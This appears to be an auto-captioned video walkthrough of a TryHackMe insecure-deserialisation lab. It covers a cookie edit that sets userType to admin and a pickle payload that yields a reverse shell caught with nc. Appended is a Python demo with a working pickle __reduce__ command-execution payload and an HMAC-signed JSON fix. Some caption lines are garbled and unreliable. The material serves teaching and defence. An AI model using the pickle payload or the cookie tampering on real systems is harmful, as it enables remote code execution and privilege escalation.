1 00:00:00,810 --> 00:00:03,630 So, in this video we're going to talk about insecure deserialisation.
2 00:00:04,920 --> 00:00:08,460 Before that, we will cover the concept of serialisation.
3 00:00:08,460 --> 00:00:15,030 And this here, suppose, is the PC.
4 00:00:19,980 --> 00:00:24,390 So this is my computer and this is the Web server.
5 00:00:26,550 --> 00:00:28,350 Let's see.
6 00:00:28,560 --> 00:00:30,120 And this is the database.
7 00:00:35,610 --> 00:00:36,690 So, DB.
8 00:00:39,160 --> 00:00:45,920 So, sorry for the drawing. So you will send so much data to this Web server in the request, but there
9 00:00:45,970 --> 00:00:46,100 are.
10 00:00:46,540 --> 00:00:47,320 There are, anyway.
11 00:00:47,440 --> 00:00:54,820 So you may send numbers, one, two, and characters, etc.
12 00:00:56,270 --> 00:01:01,800 So sometimes you will have to send the CSV files, you have to send the video files, and so much data,
13 00:01:02,300 --> 00:01:06,220 so these Web servers can implement the serialisation.
14 00:01:06,440 --> 00:01:14,550 So this serialisation is transforming any data to a single format, that is like, suppose, an
15 00:01:18,840 --> 00:01:29,190 encoding. So encoding will get the X form or some other X format, so this X format will be stored
16 00:01:29,190 --> 00:01:32,460 directly in the database by the Web server.
17 00:01:33,390 --> 00:01:42,330 So this is called serialisation: changing the normal data into some binary raw data or, something to say,
18 00:01:42,330 --> 00:01:45,420 X format, by applying some algorithms, you see.
19 00:01:46,530 --> 00:01:53,010 So this is very easy, because the database doesn't need to validate this value and no need to worry about the
20 00:01:53,010 --> 00:01:57,270 data type and the schema to store, and other problems.
21 00:01:57,280 --> 00:02:00,710 So it just simply stores this serialised data.
22 00:02:01,500 --> 00:02:06,570 So it will be very easy for transport from one database to another database.
23 00:02:06,690 --> 00:02:07,690 No need to worry about this.
24 00:02:08,040 --> 00:02:12,540 So in this database, the serialised data will be stored.
25 00:02:12,780 --> 00:02:21,350 So upon retrieval, the serialised data will be decoded, either by the Web server.
26 00:02:22,320 --> 00:02:29,820 So it will be deserialised back to this normal format, B or whatever.
27 00:02:30,450 --> 00:02:39,600 So in this manner and this method, the decoding or whatever the operation performed here, it will
28 00:02:39,600 --> 00:02:42,000 be a reverse operation to this operation.
29 00:02:42,480 --> 00:02:45,180 So this is called deserialisation.
30 00:02:45,420 --> 00:02:53,760 So transforming that serialised data or some other raw data into the actual meaningful data is called deserialisation.
31 00:02:54,870 --> 00:03:00,870 And the Web server, after this transformation, will get the result to the computer.
32 00:03:01,560 --> 00:03:04,820 So that is the serialisation and deserialisation.
33 00:03:05,340 --> 00:03:11,160 Suppose if any Web server is using a programming language like Ruby, it is called marshalling.
34 00:03:11,430 --> 00:03:17,680 So serialisation is called marshalling, and in Python it is called pickling, and serialisation in common.
35 00:03:18,330 --> 00:03:21,280 So suppose there is a vulnerability in the programming language.
36 00:03:21,450 --> 00:03:26,830 So with this encoding, whatever data you can send, even the reverse shell.
37 00:03:26,910 --> 00:03:35,060 So if you send the reverse shell, it will encode this and it will execute it in the serialised data; upon deserialisation
38 00:03:35,080 --> 00:03:35,800 it will execute.
39 00:03:35,850 --> 00:03:43,920 So, uh, you can send a reverse shell in the encoded format. So that, for the theory: what is this serialisation?
40 00:03:43,920 --> 00:03:53,790 Transforming normal, actual data into the, uh, some other, that is, X format data by applying
41 00:03:53,790 --> 00:03:57,570 some algorithms and encoding, and then it will be stored in the database.
42 00:03:57,790 --> 00:04:03,920 So then you can retrieve those data and you can transform it back into this normal data, meaningful
43 00:04:03,930 --> 00:04:04,860 and useful data.
44 00:04:05,670 --> 00:04:07,980 This is serialisation and deserialisation.
45 00:04:08,580 --> 00:04:10,950 So what is insecure deserialisation?
46 00:04:11,100 --> 00:04:19,050 You can execute the code upon deserialising, the process upon deserialising the data.
47 00:04:19,860 --> 00:04:23,880 So let's go to TryHackMe, or I have started to do so.
48 00:04:23,880 --> 00:04:27,850 We have already done this cross-site scripting room, but we did not get the answer.
49 00:04:28,320 --> 00:04:33,480 So let's focus on this insecure deserialisation, so you can read this theory.
50 00:04:33,810 --> 00:04:39,060 And I use the issue to read the story and tomka application.
51 00:04:40,380 --> 00:04:42,340 I think some, so many.
52 00:04:42,370 --> 00:04:43,430 I said, are you OK?
53 00:04:43,950 --> 00:04:46,560 Let me just focus on the main concept.
54 00:04:47,940 --> 00:04:50,120 So, in object-oriented programming.
55 00:04:50,140 --> 00:04:51,030 Don't worry about this.
56 00:04:51,030 --> 00:04:54,300 We have what is called, in Python, state and behavior.
57 00:04:54,420 --> 00:05:03,060 So the state is like whether it's, uh, uh, what color; the properties of the object itself, it is called state.
58 00:05:03,240 --> 00:05:08,270 So whether the bulb is white color or pink color or any other color.
59 00:05:08,550 --> 00:05:14,320 So that is state. Uh, behavior means, uh, the action that the object does.
60 00:05:15,840 --> 00:05:22,060 I can take that particular object and I can have different types of bulbs, so different bulbs,
61 00:05:22,230 --> 00:05:26,040 etc. So different bulb parts, and there should be on and off.
62 00:05:26,040 --> 00:05:27,450 So that is called behavior.
63 00:05:27,450 --> 00:05:31,410 So on and off behavior, and state would be the types of these bulbs.
64 00:05:33,290 --> 00:05:38,900 So they have asked the same question: if a dog was sleeping, this would be a behavior, that it
65 00:05:39,110 --> 00:05:41,080 is doing some action and it is sleeping.
66 00:05:42,020 --> 00:05:45,390 So let's go through this deserialisation.
67 00:05:45,740 --> 00:05:50,500 They have given a Web server and the client.
68 00:05:50,510 --> 00:05:52,010 It is sending the password, one, two, three.
69 00:05:52,160 --> 00:06:00,080 So they are converting the password into binary format, so that it is converted to binary, and they are storing
70 00:06:00,080 --> 00:06:06,980 in that database, so this database can be exported into some other format and they can read the binary
71 00:06:06,980 --> 00:06:07,400 format.
72 00:06:09,960 --> 00:06:13,730 So this is a binary, so let's answer this one.
73 00:06:17,140 --> 00:06:22,200 So let's also answer this one, make sure that we have done this, alright.
74 00:06:27,120 --> 00:06:28,700 So now let's go to these cookies.
75 00:06:32,930 --> 00:06:38,750 So cookies store the session information, so you can see this one: we use cookies to ensure the best
76 00:06:38,750 --> 00:06:43,030 user experience, for almost any websites like Amazon, Flipkart, etc.
77 00:06:43,340 --> 00:06:50,750 So why this is, because they need to track your behavior towards the website, whether you are using
78 00:06:50,750 --> 00:06:55,550 the electronics, whether you are using the mobiles or any other shopping materials, and they will
79 00:06:55,550 --> 00:07:02,340 keep the track in the cart and they will show you some more products related to your search in their website,
80 00:07:02,360 --> 00:07:04,480 so for that they will use the cookies.
81 00:07:05,630 --> 00:07:14,300 And you can see this is the typical cookie, the type of this one, that is like a variable name and IP
82 00:07:14,300 --> 00:07:19,170 address and a session ID, and the value of this variable.
83 00:07:20,510 --> 00:07:23,300 So as you can see, this is the description of this cookie.
84 00:07:23,300 --> 00:07:29,060 A cookie can have a name and value; this is very common, because the cookie's main attributes are name and
85 00:07:29,060 --> 00:07:31,490 value, and there can be extra attributes:
86 00:07:31,640 --> 00:07:33,200 Secure, Expiry, Path.
87 00:07:36,720 --> 00:07:45,660 And they have given some example, and you can see that, so you can get the part of the camera.
88 00:07:46,010 --> 00:07:54,300 But what they were, that was, the user has to use this, the same URL in block plugin.
89 00:07:54,930 --> 00:07:57,450 So let's do this cookies practical. From here on,
90 00:07:57,450 --> 00:07:57,750 what
91 00:07:57,750 --> 00:07:59,690 we just read, pay some attention.
92 00:08:00,810 --> 00:08:03,360 So let's go to this website.
93 00:08:04,680 --> 00:08:08,730 And they have given some cookies, and they are asking to change
94 00:08:08,730 --> 00:08:12,430 its key to get the admin flag.
95 00:08:14,220 --> 00:08:21,750 So let me go to my Kali Linux machine, and let me go into this website.
96 00:08:23,920 --> 00:08:31,540 So click on this exchange, go to this exchange there and sign up, let's say Nicole, Nicole.
97 00:08:35,240 --> 00:08:44,180 All right, username user, and exchange. Click on this Inspect Element, and there you can see
98 00:08:44,180 --> 00:08:50,540 the Storage, and in the Storage you can see all the stored information like cookies and other attributes,
99 00:08:50,540 --> 00:08:54,210 where you can see, and this is better.
100 00:08:57,130 --> 00:08:59,650 I think we could decode this.
101 00:09:02,060 --> 00:09:03,450 So let me give it a try.
102 00:09:04,790 --> 00:09:06,950 So there is a cookie.
103 00:09:08,230 --> 00:09:13,140 Select this one and send it to base64.
104 00:09:14,870 --> 00:09:15,560 Decode.
105 00:09:18,170 --> 00:09:21,360 So it's not a flag, sorry. Further,
106 00:09:21,850 --> 00:09:33,980 it's not a flag, and userType, you need to change this to admin to get the admin flag, that's what
107 00:09:33,980 --> 00:09:34,600 they're saying.
108 00:09:35,620 --> 00:09:40,930 So double-click on the value; you are allowed to modify the contents.
109 00:09:44,430 --> 00:09:46,730 Now, let me reload this page.
110 00:09:48,530 --> 00:09:53,870 And you can see we have got the admin dashboard and there is this flag, copy this.
111 00:09:56,360 --> 00:10:03,350 So this is the session data, so we can all see this now, it may be serialised, or deserialised.
112 00:10:05,360 --> 00:10:12,200 Maybe this is not surprising: this session is serialised and is getting deserialised.
113 00:10:13,040 --> 00:10:14,840 So, I mean, that's what this one is.
114 00:10:16,230 --> 00:10:19,000 And we need to give you.
115 00:10:21,280 --> 00:10:23,250 The flag is Kimberly.
116 00:10:26,900 --> 00:10:27,500 September.
117 00:10:31,050 --> 00:10:32,850 Where is this cookie, where is it.
118 00:10:43,940 --> 00:10:45,900 All right, OK, let's go.
119 00:10:48,050 --> 00:10:52,430 Maybe I just want you to go to the movie where you hear.
120 00:10:54,450 --> 00:10:57,270 So let's move on to another one, that is, code execution.
121 00:10:58,020 --> 00:11:01,510 This is a very interesting one, so I need to click on this exchange.
122 00:11:01,980 --> 00:11:04,260 So let's go ahead and click on this exchange site.
123 00:11:11,490 --> 00:11:18,090 So I think we need to click on this, provide feedback, provide feedback, so click on this, provide
124 00:11:18,090 --> 00:11:18,690 your feedback.
125 00:11:18,780 --> 00:11:26,310 So it's asking for username and my comments, and you can inject the reverse shell in the encoded format, because if
126 00:11:26,310 --> 00:11:29,730 you send it or whatever, it will be decoded again.
127 00:11:29,740 --> 00:11:36,000 And basically that's why we need to encode it in base64, and when it is, uh, it will automatically
128 00:11:36,000 --> 00:11:39,410 decode into a normal format and then execute.
129 00:11:39,840 --> 00:11:41,940 So this is, uh, in Python.
130 00:11:42,690 --> 00:11:51,690 They are using this particular module, the pickle module, which is used to serialise the data, and then you get the
131 00:11:51,690 --> 00:11:58,950 pickled data, then we're encoding it in base64 and then just setting the cookie.
132 00:11:58,980 --> 00:12:00,410 So this is the server-side code.
133 00:12:01,450 --> 00:12:05,430 You can see the data and you're encoding with base64.
134 00:12:07,240 --> 00:12:13,090 And you can see this is the cookie that they are asking for, and we are decoding
135 00:12:13,090 --> 00:12:18,960 this so we can print in a normal format, so we can also use it without Python programming.
136 00:12:20,710 --> 00:12:22,410 So they have given this code.
137 00:12:22,900 --> 00:12:27,700 So now to execute this reverse shell, we need to encode this in the base64 format.
138 00:12:28,420 --> 00:12:30,200 So this is the code they had.
139 00:12:30,580 --> 00:12:31,930 Condra. And
140 00:12:35,610 --> 00:12:45,960 And copy this one, and paste it in ours, rce, not, but let's say the same, with the
141 00:12:45,960 --> 00:12:48,750 same name they could have.
142 00:12:48,750 --> 00:12:52,880 But we need to change this reverse shell
143 00:12:54,210 --> 00:12:55,260 uh, code,
144 00:12:57,700 --> 00:13:08,450 to this IP address, to our tun0 IP address, because that's where we are connected to this IP.
145 00:13:11,130 --> 00:13:12,750 So let's copy this.
146 00:13:15,140 --> 00:13:23,540 And paste it in here, let's say the port, one, two, two, one, two, three, five, one, two, three,
147 00:13:23,540 --> 00:13:23,680 four.
148 00:13:23,720 --> 00:13:31,040 Right now, what we're going to do is, we need to just, let me show you this.
149 00:13:31,790 --> 00:13:35,240 So first, we are importing all the modules in the Python system.
150 00:13:35,360 --> 00:13:41,000 And this, for this RCE, will accept the object.
151 00:13:42,050 --> 00:13:44,510 So this will execute this.
152 00:13:45,110 --> 00:13:52,980 This is a reverse shell and this will encode it in base64, and then it will be, upon the serialised data, deserialised,
153 00:13:53,000 --> 00:14:03,890 and it will unpickle the data and then execute this command. So run Python 3 with this setup to
154 00:14:03,890 --> 00:14:11,780 generate this base64 type of our payload in the base64 format, so that we copy this.
155 00:14:13,680 --> 00:14:26,130 And now we need to paste this in this, and this one. So before that, we need to go on and
156 00:14:27,030 --> 00:14:31,110 listen using this nc; my port will be one, two, three, five.
157 00:14:31,590 --> 00:14:33,690 And we are going on listening on this port.
158 00:14:34,140 --> 00:14:36,350 And let me reload this page.
159 00:14:36,930 --> 00:14:44,270 So this payload will be sent to the server and it will decode and deserialise, and then we will get the shell.
160 00:14:45,300 --> 00:14:49,520 So we have successfully got the shell, we can say, and ls.
161 00:14:51,060 --> 00:14:54,150 So this is, after that, is the Flask.
162 00:14:54,540 --> 00:14:58,110 Uh, this looks similar to Django also.
163 00:14:59,700 --> 00:15:07,110 So I think we should go to the home directory, home, to get the flag.
164 00:15:09,560 --> 00:15:12,350 So we have successfully got this.
165 00:15:15,380 --> 00:15:18,860 ls, cd.
166 00:15:20,750 --> 00:15:23,850 ls, and there is our txt.
167 00:15:26,900 --> 00:15:31,830 So it is a pleasure to be here.
168 00:15:33,210 --> 00:15:35,520 So this is all this insecure deserialisation.
169 00:15:36,930 --> 00:15:44,820 So in this Python application, they have this particular module, it will simply execute whatever we
170 00:15:44,820 --> 00:15:45,450 have sent.
171 00:15:45,870 --> 00:15:51,460 But we should send it in a format that the server is expecting: serialised and encoded in base64.
172 00:15:51,700 --> 00:15:57,980 That's why we have created this base64 encoding and we have serialised this command.
173 00:15:58,260 --> 00:16:01,250 So on the server side, it has decoded and deserialised.
174 00:16:01,440 --> 00:16:03,990 And then this command got executed.
175 00:16:04,830 --> 00:16:06,360 So that's why we got the reverse shell.
176 00:16:07,140 --> 00:16:10,490 I hope you understood this server-side insecure deserialisation.
177 00:16:10,950 --> 00:16:15,090 Once you practise this on this machine, you'll understand it easily.
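The pickle-in-a-base64-cookie pattern the video exploits, with the fix a practitioner would want next to it, as an added example that is not part of the video or of the TryHackMe room's own code. It contains the server helper that pickles a session object into a cookie, the vulnerable reader, an attacker object whose __reduce__ makes the server run a command while pickle.loads is still executing (a harmless echo here, where the video's rce.py uses a reverse shell), and a hardened reader that accepts only HMAC-signed JSON so that neither the command payload nor a userType "user" to "admin" edit gets through. The session contents, the cookie layout, the function names and the secret key are all constructed for this example.

```python
import base64
import hashlib
import hmac
import json
import pickle
import subprocess

# --- 1. The vulnerable pattern from the video: pickle an object, base64 it, set it as a cookie ---

def make_pickle_cookie(session_obj):
    """Server side: serialise with pickle, then base64 so it fits in a cookie value."""
    return base64.b64encode(pickle.dumps(session_obj)).decode("ascii")


def vulnerable_read_cookie(cookie):
    """Server side, VULNERABLE: pickle.loads rebuilds whatever the client sent.
    Any callable named by the payload's __reduce__ runs *during* loads, so
    checking the returned object afterwards is already too late."""
    return pickle.loads(base64.b64decode(cookie))


# --- 2. The attacker's payload: what rce.py in the video builds, with a harmless command ---

class CommandRunner:
    """pickle does not store this class's code, only the (callable, args) tuple that
    __reduce__ returns; the victim calls subprocess.check_output(argv) while unpickling
    and loads() returns the command's output. The video points this at a reverse shell;
    argv here is a constructed echo so the example runs offline."""

    def __init__(self, argv):
        self.argv = argv

    def __reduce__(self):
        return (subprocess.check_output, (self.argv,))


def build_exploit_cookie(argv):
    """The base64 string an attacker pastes into the cookie in place of the real session."""
    return make_pickle_cookie(CommandRunner(argv))


# --- 3. Hardened version: data-only format plus an integrity check ---

SECRET_KEY = b"constructed-demo-key-do-not-reuse"  # assumption: a server-side secret; use random bytes in practice


def make_signed_cookie(session_dict, key=SECRET_KEY):
    """JSON carries data only (no callables), and the HMAC stops the client editing it."""
    body = base64.urlsafe_b64encode(json.dumps(session_dict, sort_keys=True).encode()).decode("ascii")
    sig = hmac.new(key, body.encode("ascii"), hashlib.sha256).hexdigest()
    return f"{body}.{sig}"


def safe_read_cookie(cookie, key=SECRET_KEY):
    """Verify the MAC before decoding anything; reject everything that is not a JSON object."""
    body, sep, sig = cookie.rpartition(".")
    if not sep:
        raise ValueError("malformed cookie")
    expected = hmac.new(key, body.encode("ascii"), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):
        raise ValueError("bad signature")
    data = json.loads(base64.urlsafe_b64decode(body))
    if not isinstance(data, dict):
        raise ValueError("unexpected payload type")
    return data


if __name__ == "__main__":
    session = {"user": "nicole", "userType": "user"}  # constructed session for the demo
    print("vulnerable round trip:", vulnerable_read_cookie(make_pickle_cookie(session)))
    # The "session" the attacker sends is really a command; loads() hands back its output.
    print("vulnerable + exploit:", vulnerable_read_cookie(build_exploit_cookie(["echo", "pwned"])))
    print("signed round trip:", safe_read_cookie(make_signed_cookie(session)))
    for bad in (build_exploit_cookie(["echo", "pwned"]),
                make_signed_cookie({"user": "nicole", "userType": "admin"}, key=b"attacker-guess")):
        try:
            safe_read_cookie(bad)
        except ValueError as err:
            print("rejected:", err)
```

Run it with python3 on a POSIX system (the constructed payload calls echo). The vulnerable reader returns b"pwned\n" for the exploit cookie because the command ran inside pickle.loads; the signed reader rejects that cookie before decoding it and rejects the re-signed admin cookie because the client does not hold the key. Both halves of the fix matter: signing alone still leaves pickle in the path, so a leaked key would bring the code execution back, which is why the body is JSON.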